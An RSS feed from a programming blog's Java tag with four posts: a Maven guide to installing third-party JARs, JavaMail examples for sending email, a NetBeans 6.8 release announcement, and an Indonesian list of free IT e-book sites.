<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>dijexi.com &#187; Java</title>
	<atom:link href="http://www.dijexi.com/tag/java/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.dijexi.com</link>
	<description>free programming tutorial, tips and tricks on php, codeigniter, delphi, dotnet, ajax and more..</description>
	<lastBuildDate>Fri, 13 Jan 2012 23:21:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
<atom:link rel="hub" href="http://pubsubhubbub.appspot.com"/><atom:link rel="hub" href="http://superfeedr.com/hubbub"/>		<item>
		<title>Guide to installing 3rd party JARs in Maven</title>
		<link>http://www.dijexi.com/2011/06/guide-to-installing-3rd-party-jars-in-maven/</link>
		<comments>http://www.dijexi.com/2011/06/guide-to-installing-3rd-party-jars-in-maven/#comments</comments>
		<pubDate>Fri, 17 Jun 2011 09:32:15 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Funambol]]></category>
		<category><![CDATA[Java]]></category>
		<category><![CDATA[jbilling]]></category>
		<category><![CDATA[add external jar]]></category>
		<category><![CDATA[maven]]></category>

		<guid isPermaLink="false">http://www.dijexi.com/2011/06/guide-to-installing-3rd-party-jars-in-maven/</guid>
		<description><![CDATA[Often times you will have 3rd party JARs that you need to put in your local repository for use in your builds. The JARs must be placed in the local repository in the correct place in order for it to be correctly picked up by Maven. To make this easier, and less error prone, we [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><p>Often times you will have 3rd party JARs that you need to put in your local repository for use in your builds. The JARs must be placed in the local repository in the correct place in order for it to be correctly picked up by Maven. To make this easier, and less error prone, we have provide a goal in the install plug-in which should make this relatively painless. </p>
<p>To install a JAR in the local repository use the following command:</p>
<blockquote><p>mvn install:install-file -Dfile=&lt;path-to-file&gt; -DgroupId=&lt;group-id&gt; \ -DartifactId=&lt;artifact-id&gt; -Dversion=&lt;version&gt; -Dpackaging=&lt;packaging&gt;</p>
</blockquote>
<p>&#160;</p>
<p>For example, to install jbilling_api.jar (API for connecting to JBilling application), use the following command:</p>
<blockquote><p>mvn install:install-file -Dfile=/opt/jbilling_api.jar -DgroupId=jbilling \ -DartifactId=jbilling -Dversion=2.0 -Dpackaging=jar</p>
</blockquote>
<p>Then, on the project’s POM file, add the following external dependency, so that Maven will include this jar while compiling: </p>
<blockquote><p>&lt;dependencies&gt; </p>
<p>…</p>
<p>&#160;&#160; &lt;dependency&gt;      <br />&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; &lt;groupId&gt;jbilling&lt;/groupId&gt;       <br />&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; &lt;artifactId&gt;jbilling&lt;/artifactId&gt;       <br />&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; &lt;version&gt;2.0&lt;/version&gt;       <br />&#160;&#160;&#160; &lt;/dependency&gt; </p>
<p>… </p>
<p>&lt;/dependencies&gt; </p>
</blockquote>
<div style="padding-bottom: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; float: none; padding-top: 0px" id="scid:0767317B-992E-4b12-91E0-4F059A8CECA8:01fe9c3d-a785-4bbf-839a-75fe97155096" class="wlWriterEditableSmartContent">Technorati Tags: <a href="http://technorati.com/tags/maven" rel="tag">maven</a>,<a href="http://technorati.com/tags/java" rel="tag">java</a>,<a href="http://technorati.com/tags/add+external+jar" rel="tag">add external jar</a>,<a href="http://technorati.com/tags/jbilling" rel="tag">jbilling</a></div>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://www.dijexi.com/2009/12/netbeans-ide-6-8-released/" rel="bookmark">NetBeans IDE 6.8 Released</a></li><li><a href="http://www.dijexi.com/2009/06/adempiere-opensource-erp-installation/" rel="bookmark">001 Adempiere Opensource ERP Installation</a></li><li><a href="http://www.dijexi.com/2009/09/guide-to-implementing-business-intelligence-3-business-intelligence-tools-solutions/" rel="bookmark">Guide To Implementing Business Intelligence - 3. Business Intelligence Tools &amp; Solutions</a></li><li><a href="http://www.dijexi.com/2010/02/funambol-mobile-open-source-book-released/" rel="bookmark">Funambol Mobile Open Source Book Released</a></li><li><a href="http://www.dijexi.com/2009/07/codeigniter-tutorial-creating-accounting-application-part-1-setting-up-the-environment/" rel="bookmark">CodeIgniter Tutorial: [Creating Accounting Application] Part 1 Setting Up the Environment</a></li></ul></div><!--INFOLINKS_OFF--><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fwww.dijexi.com%2F2011%2F06%2Fguide-to-installing-3rd-party-jars-in-maven%2F&amp;linkname=Guide%20to%20installing%203rd%20party%20JARs%20in%20Maven"><img src="http://www.dijexi.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share/Bookmark"/></a>]]></content:encoded>
			<wfw:commentRss>http://www.dijexi.com/2011/06/guide-to-installing-3rd-party-jars-in-maven/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to Send Email on Java Application using JavaMail API</title>
		<link>http://www.dijexi.com/2010/07/how-to-send-email-on-java-application-using-javamail-api/</link>
		<comments>http://www.dijexi.com/2010/07/how-to-send-email-on-java-application-using-javamail-api/#comments</comments>
		<pubDate>Fri, 02 Jul 2010 03:33:05 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Java]]></category>
		<category><![CDATA[web development]]></category>
		<category><![CDATA[javamail]]></category>
		<category><![CDATA[sending email]]></category>

		<guid isPermaLink="false">http://www.dijexi.com/2010/07/how-to-send-email-on-java-application-using-javamail-api/</guid>
		<description><![CDATA[This article explain how to use JavaMail API for sending email through our Java application. This will cover simple email, HTML email, and email with attachments. The required JavaMail API can found here. Put it on a directory accessible by CLASSPATH setting. It&#8217;s a good idea to read the JavaMail FAQ. Simple Email This test [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><p>This article explain how to use JavaMail API for sending email through our Java application. This will cover simple email, HTML email, and email with attachments.</p>
<p>The required JavaMail API can found <a href="http://java.sun.com/products/javamail/">here</a>. Put it on a directory accessible by CLASSPATH setting. It&#8217;s a good idea to read the <a href="http://java.sun.com/products/javamail/FAQ.html">JavaMail FAQ</a>.</p>
<p> <span id="more-1322"></span><br />
<h2>Simple Email</h2>
<p>This test application is used for sending simple email.</p>
<pre>import javax.mail.*;
import javax.mail.internet.*;

import java.util.Properties;

class SimpleMail {
    public static void main(String[] args) throws Exception{
      Properties props = new Properties();
      props.setProperty(&quot;mail.transport.protocol&quot;, &quot;smtp&quot;);
      props.setProperty(&quot;mail.host&quot;, &quot;mail.server.com&quot;);
      props.setProperty(&quot;mail.user&quot;, &quot;mailuser&quot;);
      props.setProperty(&quot;mail.password&quot;, &quot;mailpwd&quot;);

      Session mailSession = Session.getDefaultInstance(props, null);
      Transport transport = mailSession.getTransport();

      MimeMessage message = new MimeMessage(mailSession);
      message.setSubject(&quot;Testing simple email by JavaMail API&quot;);
      message.setContent(&quot;This is just a test&quot;, &quot;text/plain&quot;);
      message.addRecipient(Message.RecipientType.TO,
           new InternetAddress(&quot;rhoma@irama.org&quot;));

      transport.connect();
      transport.sendMessage(message,
          message.getRecipients(Message.RecipientType.TO));
      transport.close();
    }
}</pre>
<p>&#160;</p>
<h2>HTML Email</h2>
<p>This application is a sample of sending HTML email using JavaMail API.</p>
<pre>import javax.mail.*;
import javax.mail.internet.*;

import java.util.Properties;

class SimpleHTMLMail {
    public static void main(String[] args) throws Exception{
      Properties props = new Properties();
      props.setProperty(&quot;mail.transport.protocol&quot;, &quot;smtp&quot;);
      props.setProperty(&quot;mail.host&quot;, &quot;mail.server.com&quot;);
      props.setProperty(&quot;mail.user&quot;, &quot;mailuser&quot;);
      props.setProperty(&quot;mail.password&quot;, &quot;mailpwd&quot;);

      Session mailSession = Session.getDefaultInstance(props, null);
      Transport transport = mailSession.getTransport();

      MimeMessage message = new MimeMessage(mailSession);
      message.setSubject(&quot;Testing JavaMail HTML email&quot;);
      message.setContent
         (&quot;This is just a test &lt;b&gt;HOW TO&lt;b&gt; send HTML email&quot;,                 &quot;text/html; charset=ISO-8859-1&quot;);
      message.addRecipient(Message.RecipientType.TO,
         new InternetAddress(&quot;rhoma@irama.org&quot;));

      transport.connect();
      transport.sendMessage(message,
         message.getRecipients(Message.RecipientType.TO));
      transport.close();
    }
}</pre>
<h2>Email with Attachments</h2>
<p>This is a sample application for sending email with attachment using JavaMail API. Note that you will also need additional Jar for this, the Java Activation Framework, JAF, which can be downloaded <a href="http://java.sun.com/javase/technologies/desktop/javabeans/jaf/index.jsp" target="_blank">here</a>.</p>
<pre>import javax.mail.*;
import javax.mail.internet.*;
import javax.activation.FileDataSource;
import javax.activation.DataHandler;

import java.util.Properties;

class SimpleMailWithAttachment {
    public static void main(String[] args) throws Exception{
      boolean debug = false;
      Properties props = new Properties();
      props.setProperty(&quot;mail.transport.protocol&quot;, &quot;smtp&quot;);
      props.setProperty(&quot;mail.host&quot;, &quot;mymail.server.org&quot;);
      props.setProperty(&quot;mail.user&quot;, &quot;emailuser&quot;);
      props.setProperty(&quot;mail.password&quot;, &quot;&quot;);

      Session mailSession = Session.getDefaultInstance(props, null);
      mailSession.setDebug(debug);
      Transport transport = mailSession.getTransport();

      MimeMessage message = new MimeMessage(mailSession);
      message.setSubject(&quot;Testing javamail with attachment&quot;);

      MimeBodyPart textPart = new MimeBodyPart();
      textPart.setContent(&quot;&lt;h1&gt;Check attachment&lt;/h1&gt;&quot;, &quot;text/html&quot;);

      MimeBodyPart attachFilePart = new MimeBodyPart();
      FileDataSource fds =
          new FileDataSource(&quot;SimpleMailWithAttachment.java&quot;);
      attachFilePart.setDataHandler(new DataHandler(fds));
      attachFilePart.setFileName(fds.getName());

      Multipart mp = new MimeMultipart();
      mp.addBodyPart(textPart);
      mp.addBodyPart(attachFilePart);

      message.setContent(mp);
      message.addRecipient(Message.RecipientType.TO,
          new InternetAddress(&quot;elvis@presley.org&quot;));

      transport.connect();
      transport.sendMessage(message,
          message.getRecipients(Message.RecipientType.TO));
      transport.close();
    }
}</pre>
<div style="padding-bottom: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; float: none; padding-top: 0px" id="scid:0767317B-992E-4b12-91E0-4F059A8CECA8:2ca7d2a8-7aeb-4cc0-828e-0188b37e802b" class="wlWriterEditableSmartContent">Technorati Tags: <a href="http://technorati.com/tags/sending+email" rel="tag">sending email</a>,<a href="http://technorati.com/tags/java" rel="tag">java</a>,<a href="http://technorati.com/tags/javamail" rel="tag">javamail</a></div>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://www.dijexi.com/2010/03/show-the-list-of-installed-packages-on-ubuntu-or-debian/" rel="bookmark">Show the List of Installed Packages on Ubuntu or Debian</a></li><li><a href="http://www.dijexi.com/2009/12/netbeans-ide-6-8-released/" rel="bookmark">NetBeans IDE 6.8 Released</a></li><li><a href="http://www.dijexi.com/2010/08/creating-gps-tracker-application-on-j2me-phones/" rel="bookmark">Creating GPS Tracker Application on J2ME Phones</a></li><li><a href="http://www.dijexi.com/2010/08/j2me-current-date-and-time/" rel="bookmark">J2ME Current date and Time</a></li><li><a href="http://www.dijexi.com/2009/10/funambol-for-blackberry-like-capabilities-on-cheap-handsets/" rel="bookmark">Funambol for BlackBerry-like capabilities on cheap handsets</a></li></ul></div><!--INFOLINKS_OFF--><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fwww.dijexi.com%2F2010%2F07%2Fhow-to-send-email-on-java-application-using-javamail-api%2F&amp;linkname=How%20to%20Send%20Email%20on%20Java%20Application%20using%20JavaMail%20API"><img src="http://www.dijexi.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share/Bookmark"/></a>]]></content:encoded>
			<wfw:commentRss>http://www.dijexi.com/2010/07/how-to-send-email-on-java-application-using-javamail-api/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>NetBeans IDE 6.8 Released</title>
		<link>http://www.dijexi.com/2009/12/netbeans-ide-6-8-released/</link>
		<comments>http://www.dijexi.com/2009/12/netbeans-ide-6-8-released/#comments</comments>
		<pubDate>Tue, 15 Dec 2009 03:39:45 +0000</pubDate>
		<dc:creator>akhmad daniel sembiring</dc:creator>
				<category><![CDATA[IT News]]></category>
		<category><![CDATA[Java]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[web development]]></category>
		<category><![CDATA[ide]]></category>
		<category><![CDATA[Netbeans]]></category>
		<category><![CDATA[Software Development]]></category>

		<guid isPermaLink="false">http://www.dijexi.com/2009/12/netbeans-ide-6-8-released/</guid>
		<description><![CDATA[NetBeans™ IDE 6.8 offers best-in-class support for the entire Java™ Platform Enterprise Edition 6 specification and the Sun GlassFish™ Enterprise Server v3 platform. Simplify Java application development with Java EE 6 language features: less XML configuration and more POJO-like development; easily target and deploy to GlassFish v3. NetBeans IDE continues to be the tool of [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><p><b>NetBeans™ IDE 6.8</b> offers best-in-class support for the <b>entire Java™ Platform Enterprise Edition 6 specification</b> and the <b>Sun GlassFish™ Enterprise Server v3 platform</b>. Simplify Java application development with Java EE 6 language features: less XML configuration and more POJO-like development; easily target and deploy to GlassFish v3. </p>
<p><b>NetBeans IDE</b> continues to be the tool of choice for top development languages, and this release includes new features and improved support for <b>PHP 5.3</b> and the <b>Symfony framework</b>, the latest <b>JavaFX™ SDK 1.2.1, C/C++, Ruby, Maven</b> and more. Integration with <b>Project Kenai</b>, a collaborative environment for hosting open-source projects, now offers full support for <b>JIRA</b>, as well as improved issue tracker integration. As always, the <b>NetBeans Platform</b> provides a rock-solid application framework that can save years of development time. </p>
<p>Supporting Java EE 6 improvements first, NetBeans IDE 6.8 boosts developer productivity and lets developers take advantage of today&#8217;s latest languages and platform features. </p>
<p>NetBeans IDE 6.8 is available in English, Brazilian-Portuguese, Japanese and Simplified Chinese. </p>
<p><a href="http://netbeans.org/downloads/index.html?cid=928534"><img alt="Get Tomorrow Today with NetBeans IDE 6.8!" src="http://netbeans.org/images_www/newsletter/6.8/header.jpg" width="675" height="153" /></a></p>
<p> <span id="more-1294"></span><br />
<h2>Release Highlights</h2>
<p>Java Enterprise Edition 6</p>
<ul>
<li>JavaServer™ Faces 2.0 for web interfaces and the ability to use EJB™ software in web applications </li>
<li>Java Persistence JPA 2.0 and RESTful web services support </li>
<li>Deployment, debugging and profiling with GlassFish v3 </li>
</ul>
<p>JavaServer Faces 2.0 (Facelets)</p>
<ul>
<li>Code completion, error hints, namespace completion, documentation popups, and tag auto-import for Facelets </li>
<li>Editor support for Facelets libraries, composite components, expression language </li>
</ul>
<p>JavaFX</p>
<ul>
<li>Support for JavaFX SDK 1.2.1 </li>
<li>Improved navigation, code completion, and editor hints </li>
</ul>
<p>PHP</p>
<ul>
<li>PHP 5.3 support </li>
<li>Symfony framework support </li>
</ul>
<p>Kenai.com: Connected Developer</p>
<ul>
<li>Full JIRA support </li>
<li>Improved issue tracker integration </li>
</ul>
<p>Maven</p>
<ul>
<li>Improved support for Java EE 6, Groovy, Scala projects </li>
<li>Customizable dependency exclusion in dependency graph </li>
</ul>
<p>Ruby</p>
<ul>
<li>Support for Rails 2.3.4 apps with dispatchers, JRuby 1.4, Ruby 1.9 debugging, RSpec 1.2.7 </li>
<li>Improved rename refactoring, type inference, and navigation </li>
</ul>
<p>C/C++</p>
<ul>
<li>Profiling: New Thread Microstates indicator and Thread Details view </li>
<li>Faster synchronization during remote development </li>
</ul>
<h2>Learn More</h2>
<ul>
<li><a href="http://netbeans.org/community/releases/68/">NetBeans IDE 6.8 Release Information</a></li>
<li><a href="http://netbeans.org/kb/index.html">NetBeans IDE 6.8 Tutorials and Videos</a></li>
<li><a href="http://platform.netbeans.org/">NetBeans Platform 6.8</a></li>
<li><a href="http://netbeans.org/community/index.html">NetBeans Community</a></li>
<li><a href="http://twitter.com/netbeans">NetBeans on Twitter</a></li>
<li><a href="http://planetnetbeans.org/">Planet NetBeans</a></li>
<li><a href="https://channelsun.sun.com/category/playlist?id=81">NetBeans on ChannelSun</a></li>
</ul>
<div style="padding-bottom: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; float: none; padding-top: 0px" id="scid:0767317B-992E-4b12-91E0-4F059A8CECA8:797a2db2-ac8b-4a7f-8d96-73eb544c29d5" class="wlWriterEditableSmartContent">Technorati Tags: <a href="http://technorati.com/tags/netbeans" rel="tag">netbeans</a>,<a href="http://technorati.com/tags/ide" rel="tag">ide</a>,<a href="http://technorati.com/tags/java" rel="tag">java</a>,<a href="http://technorati.com/tags/Software+Development" rel="tag">Software Development</a></div>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://www.dijexi.com/2009/07/best-free-development-tools-and-editors-software/" rel="bookmark">Best Free Development Tools and Editors Software</a></li><li><a href="http://www.dijexi.com/2009/06/joomla-15-mengganti-footer/" rel="bookmark">Joomla 1.5: Mengganti Footer</a></li><li><a href="http://www.dijexi.com/2009/07/zero-day-vulnerability-hits-microsoft-directshow/" rel="bookmark">Zero Day Vulnerability Hits Microsoft DirectShow</a></li><li><a href="http://www.dijexi.com/2009/08/zend-studio-7-0-released/" rel="bookmark">Zend Studio 7.0 Released</a></li><li><a href="http://www.dijexi.com/2010/02/funambol-mobile-open-source-book-released/" rel="bookmark">Funambol Mobile Open Source Book Released</a></li></ul></div><!--INFOLINKS_OFF--><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fwww.dijexi.com%2F2009%2F12%2Fnetbeans-ide-6-8-released%2F&amp;linkname=NetBeans%20IDE%206.8%20Released"><img src="http://www.dijexi.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share/Bookmark"/></a>]]></content:encoded>
			<wfw:commentRss>http://www.dijexi.com/2009/12/netbeans-ide-6-8-released/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Daftar Situs Penyedia E-Book IT</title>
		<link>http://www.dijexi.com/2009/07/daftar-situs-penyedia-e-book-it/</link>
		<comments>http://www.dijexi.com/2009/07/daftar-situs-penyedia-e-book-it/#comments</comments>
		<pubDate>Fri, 17 Jul 2009 09:24:01 +0000</pubDate>
		<dc:creator>akhmad daniel sembiring</dc:creator>
				<category><![CDATA[e book]]></category>
		<category><![CDATA[E-Learning]]></category>
		<category><![CDATA[Ajax]]></category>
		<category><![CDATA[Algorithms]]></category>
		<category><![CDATA[Business & Investing]]></category>
		<category><![CDATA[C & C++]]></category>
		<category><![CDATA[Certification Stuff]]></category>
		<category><![CDATA[database]]></category>
		<category><![CDATA[Delphi]]></category>
		<category><![CDATA[Development for Web]]></category>
		<category><![CDATA[Dot NET]]></category>
		<category><![CDATA[download]]></category>
		<category><![CDATA[General Programming]]></category>
		<category><![CDATA[Graphics & Design]]></category>
		<category><![CDATA[Java]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[Magazines]]></category>
		<category><![CDATA[Medical & Health]]></category>
		<category><![CDATA[Networks]]></category>
		<category><![CDATA[Operating System]]></category>
		<category><![CDATA[Perl]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Python]]></category>
		<category><![CDATA[Science & Engineering]]></category>
		<category><![CDATA[Scripts & Web Templates]]></category>
		<category><![CDATA[Software Development]]></category>
		<category><![CDATA[UML]]></category>
		<category><![CDATA[Video Training]]></category>
		<category><![CDATA[XML]]></category>

		<guid isPermaLink="false">http://www.dijexi.com/2009/07/daftar-situs-penyedia-e-book-it/</guid>
		<description><![CDATA[Image by Andrei Z via Flickr Berikut ini daftar beberapa situs yang menyediakan e-book seputar IT yang bisa didownload gratis. List ini senantiasa diupdate, jadi sebaiknya di-bookmark siapa tau perlu di kemudian hari. Jika anda punya situs e-book yang baik silahkan hubungi kami di halaman Contact. &#160; www.Flazx.com Menyediakan e-book dengan kategori sbb : Artificial [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><div style="margin: 1em; width: 58px; display: block; float: right; height: 68px" class="zemanta-img" jquery1247822554937="703"><a href="http://www.flickr.com/photos/70561184@N00/460647338"><img style="border-bottom: medium none; border-left: medium none; display: block; border-top: medium none; border-right: medium none" alt="Mind boggling" src="http://farm1.static.flickr.com/178/460647338_eec5c06ec5_m.jpg" width="41" height="36" /></a>
<p style="font-size: 0.8em" class="zemanta-img-attribution">Image by <a href="http://www.flickr.com/photos/70561184@N00/460647338">Andrei Z</a> via Flickr</p>
</p></div>
<p>Berikut ini daftar beberapa situs yang menyediakan e-book seputar IT yang bisa didownload gratis. List ini senantiasa diupdate, jadi sebaiknya di-bookmark siapa tau perlu di kemudian hari. Jika anda punya situs e-book yang baik silahkan hubungi kami di halaman Contact.</p>
<p>&#160;</p>
<p> <span id="more-825"></span><br />
<h2><a href="http://www.flazx.com/" target="_blank">www.Flazx.com</a></h2>
<p>Menyediakan e-book dengan kategori sbb : <a class="zem_slink" title="Artificial intelligence" href="http://en.wikipedia.org/wiki/Artificial_intelligence" rel="wikipedia">Artificial Intelligence</a>, Certification, Computer Application, <a class="zem_slink" title="Computer engineering" href="http://en.wikipedia.org/wiki/Computer_engineering" rel="wikipedia">Computer Engineering</a>, Computer Hardware, Computer Science, Computer Security, Databases, Design &amp; Graphics, Electronic Commerce, Information Systems, Miscellaneous, Mobile Computing, Multimedia, Networks, Operating System, Programming, <a class="zem_slink" title="Software engineering" href="http://en.wikipedia.org/wiki/Software_engineering" rel="wikipedia">Software Engineering</a>, Telecommunication, Web </p>
<h2><a href="http://www.free-itebooks.com/" target="_blank">Free-ITebooks.com</a></h2>
<p>Menyediakan e-book dengan kategori:Artificial Intelligence, Database, dotNET, Electronic, Flash, Hacking Related, Java, Javascript, Linux, Unix, BSD, <a class="zem_slink" title="BeOS" href="http://www.beincorporated.com/" rel="homepage">BeOS</a> etc, Network &amp; Network Programming, Office Related, Other Open Source, Python, Robotics &amp; Automation, SEO, System Administration, Web &amp; Web Design Related, Links, Other Free Programming Ebooks, </p>
<h2><a href="http://corebook.blogspot.com/" target="_blank">Corebook Online Library</a> </h2>
<p>Menyediakan e-book dengan kategori:Ajax, ASP.NET , <a class="zem_slink" title="AutoCAD" href="http://www.autodesk.com/autocad" rel="homepage">AutoCAD</a> , C and C++ , C# , Delphi , Flex , Java , Javascript , MS Office , <a class="zem_slink" title="MySQL" href="http://www.mysql.com/" rel="homepage">MySQL</a> , Oracle , Photoshop , <a class="zem_slink" title="PHP" href="http://php.net/" rel="homepage">PHP</a>, SAP, Visual Basic.Net</p>
<p align="left"><script language="javascript"><!--//
var server_client_id = 1672;
var server_ad_width = 468;  
var server_ad_height = 60;
var server_ad_style = "468x60_as";
var server_code_version = "4";
var server_ad_color_border = "111111";
var server_ad_color_background = "CCCCCC";
var server_ad_color_headline = "7E8AA2";
var server_ad_color_body = "000000";
var server_ad_color_url = "666EBA";
var server_ad_keyword = "";  
var server_ad_channel = 1;
var server_publisher_channels = "";
var server_ad_random = 1;</p>
<p>//--></script><script type="text/javascript" src="http://www.adsklix.com/ads/display_ads.php">
</script></p>
<h2><a href="http://getebook.co.cc/" target="_blank">Getebook.co.cc</a></h2>
<p>Menyediakan e-book dengan kategori: Databases, Game, Graphic &amp; Design, <a class="zem_slink" title="Internet" href="http://en.wikipedia.org/wiki/Internet" rel="wikipedia">Internet</a>, Networking, Office, Operating Systems, Programming, Web Development, Other </p>
<h2><a href="http://www.netbks.com/" target="_blank">Download Free Computer Ebooks &#8211; NET BOOKS</a> </h2>
<p>Menyediakan e-book dengan kategori: Game Mini, Comics, Architecture, Business &amp; Investing, Medical &amp; Health, Science &amp; Engineering, Scripts &amp; Web Templates, Ajax, Algorithms, C &amp; C++, Certification Stuff, Database, Delphi, Development for Web, Dot NET, General Programming, Graphics &amp; Design, Java, <a class="zem_slink" title="JavaScript" href="http://en.wikipedia.org/wiki/JavaScript" rel="wikipedia">JavaScript</a>, Magazines, Networks, Operating System, Perl, PHP, Python, Software Development, UML, Video Training, XML </p>
<div style="padding-bottom: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; float: none; padding-top: 0px" id="scid:0767317B-992E-4b12-91E0-4F059A8CECA8:7ded3f6e-eb52-41be-ad5c-3c394debf115" class="wlWriterEditableSmartContent">Technorati Tags: <a href="http://technorati.com/tags/e-book" rel="tag">e-book</a>,<a href="http://technorati.com/tags/download" rel="tag">download</a>,<a href="http://technorati.com/tags/Business+%26+Investing" rel="tag">Business &amp; Investing</a>,<a href="http://technorati.com/tags/Medical+%26+Health" rel="tag">Medical &amp; Health</a>,<a href="http://technorati.com/tags/Science+%26+Engineering" rel="tag">Science &amp; Engineering</a>,<a href="http://technorati.com/tags/Scripts+%26+Web+Templates" rel="tag">Scripts &amp; Web Templates</a>,<a href="http://technorati.com/tags/Ajax" rel="tag">Ajax</a>,<a href="http://technorati.com/tags/Algorithms" rel="tag">Algorithms</a>,<a href="http://technorati.com/tags/C+%26+C%2b%2b" rel="tag">C &amp; C++</a>,<a href="http://technorati.com/tags/Certification+Stuff" rel="tag">Certification Stuff</a>,<a href="http://technorati.com/tags/Database" rel="tag">Database</a>,<a href="http://technorati.com/tags/Delphi" rel="tag">Delphi</a>,<a href="http://technorati.com/tags/Development+for+Web" rel="tag">Development for Web</a>,<a href="http://technorati.com/tags/Dot+NET" rel="tag">Dot NET</a>,<a href="http://technorati.com/tags/General+Programming" rel="tag">General Programming</a>,<a href="http://technorati.com/tags/Graphics+%26+Design" rel="tag">Graphics &amp; Design</a>,<a href="http://technorati.com/tags/Java" rel="tag">Java</a>,<a href="http://technorati.com/tags/JavaScript" rel="tag">JavaScript</a>,<a href="http://technorati.com/tags/Magazines" rel="tag">Magazines</a>,<a href="http://technorati.com/tags/Networks" rel="tag">Networks</a>,<a href="http://technorati.com/tags/Operating+System" rel="tag">Operating System</a>,<a href="http://technorati.com/tags/Perl" rel="tag">Perl</a>,<a href="http://technorati.com/tags/PHP" rel="tag">PHP</a>,<a href="http://technorati.com/tags/Python" rel="tag">Python</a>,<a href="http://technorati.com/tags/Software+Development" rel="tag">Software Development</a>,<a href="http://technorati.com/tags/UML" rel="tag">UML</a>,<a href="http://technorati.com/tags/Video+Training" rel="tag">Video Training</a>,<a href="http://technorati.com/tags/XML" rel="tag">XML</a></div>
<p>&#160;</p>
<p>More to come, stay tuned…</p>
<p>&#160;</p>
</p>
</p>
</p>
</p>
</p>
</p>
<div class="zemanta-related">
<h6 style="font-size: 1em" class="zemanta-related-title">Related articles by Zemanta</h6>
<ul class="zemanta-article-ul">
<li class="zemanta-article-ul-li"><a href="http://www.ooad.org/">Object Oriented Analysis and Design </a>(ooad.org) </li>
<li class="zemanta-article-ul-li"><a href="http://oreilly.com/catalog/9780596157135/">Learning PHP, MySQL, and JavaScript </a>(oreilly.com) </li>
<li class="zemanta-article-ul-li"><a href="http://www.noupe.com/php/php-security-tips.html">PHP Security: Fortifying Your Website- Power Tips, Tools &amp; How to&#8217;s </a>(noupe.com) </li>
<li class="zemanta-article-ul-li"><a href="http://www.slideshare.net/hjyang27/introkoreaitindustrypromotionagency">Introduction for Korea It Industry Promotion Agency </a>(slideshare.net) </li>
</ul></div>
</p>
</p>
</p>
<div style="margin-top: 10px; height: 15px" class="zemanta-pixie"><a class="zemanta-pixie-a" title="Reblog this post [with Zemanta]" href="http://reblog.zemanta.com/zemified/e7ecb3b1-4d0c-4672-8546-0fb313c61293/"><img style="border-bottom-style: none; border-right-style: none; border-top-style: none; float: right; border-left-style: none" class="zemanta-pixie-img" alt="Reblog this post [with Zemanta]" src="http://img.zemanta.com/reblog_e.png?x-id=e7ecb3b1-4d0c-4672-8546-0fb313c61293" /></a></div>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://www.dijexi.com/2009/06/joomla-1-5-mengganti-judul-welcome-to-the-frontpage/" rel="bookmark">Joomla 1.5: Mengganti Judul Welcome to the Frontpage</a></li><li><a href="http://www.dijexi.com/2009/04/bagaimana-cara-setup-paypal-modul-di-zen-cart-tm/" rel="bookmark">Bagaimana Cara Setup PayPal Modul di Zen Cart (tm)</a></li><li><a href="http://www.dijexi.com/2009/09/publishing-secrets-part-1-how-to-produce-e-books-on-the-fly/" rel="bookmark">Publishing Secrets, Part 1: How to Produce E-Books On the Fly</a></li><li><a href="http://www.dijexi.com/2009/09/why-upload-com-is-the-best-e-book-website-for-publishing-e-books-free-of-charge/" rel="bookmark">Why Upload.com Is the Best E-Book Website For Publishing E-Books Free of Charge</a></li><li><a href="http://www.dijexi.com/2010/02/funambol-mobile-open-source-book-released/" rel="bookmark">Funambol Mobile Open Source Book Released</a></li></ul></div><!--INFOLINKS_OFF--><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fwww.dijexi.com%2F2009%2F07%2Fdaftar-situs-penyedia-e-book-it%2F&amp;linkname=Daftar%20Situs%20Penyedia%20E-Book%20IT"><img src="http://www.dijexi.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" 